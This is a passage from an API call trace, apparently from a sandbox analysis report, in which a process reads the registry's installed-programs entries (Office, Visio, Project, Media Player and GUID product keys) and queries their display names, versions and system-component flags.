lpftLastWriteTime=0x0) returned 0x0 [0030.253] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MPlayer2", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MPlayer2", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="MPlayer2", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xc, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ProjectProRetail - en-us", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProjectProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProjectProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProjectProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x2c) returned 0x0 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProjectProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.254] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xf) returned 0x0 [0030.254] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.254] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xd, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ProPlusRetail - en-us", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.254] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProPlusRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProPlusRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProPlusRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x30) returned 0x0 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="ProPlusRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xf) returned 0x0 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xe, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.255] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.255] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0xf, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisioProRetail - en-us", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.255] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="VisioProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.255] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="VisioProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="VisioProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x2a) returned 0x0 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="VisioProRetail - en-us", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xf) returned 0x0 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x10, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.256] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x11, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.256] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.256] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.256] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3c) returned 0x0 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xb) returned 0x0 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x12, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{37B8F9C7-03FB-3253-8781-2517C99D7C00}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{37B8F9C7-03FB-3253-8781-2517C99D7C00}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x13, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.257] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.257] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.257] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3f) returned 0x0 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x39, lpcbData=0xe21700*=0xf) returned 0x0 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x14, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x15, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-007E-0000-1000-0000000FF1CE}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{90160000-007E-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{90160000-007E-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.258] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x16, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-1000-0000000FF1CE}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.258] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{90160000-008C-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.258] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.258] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{90160000-008C-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x17, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-1000-0000000FF1CE}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{90160000-008C-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{90160000-008C-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x18, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{929FBD26-9020-399B-9A7A-751D61F0B942}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{929FBD26-9020-399B-9A7A-751D61F0B942}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{929FBD26-9020-399B-9A7A-751D61F0B942}", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x19, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.259] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.259] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.259] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033", ulOptions=0x0, samDesired=0x20119, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.260] RegQueryValueExA (in: hKey=0x1a8, 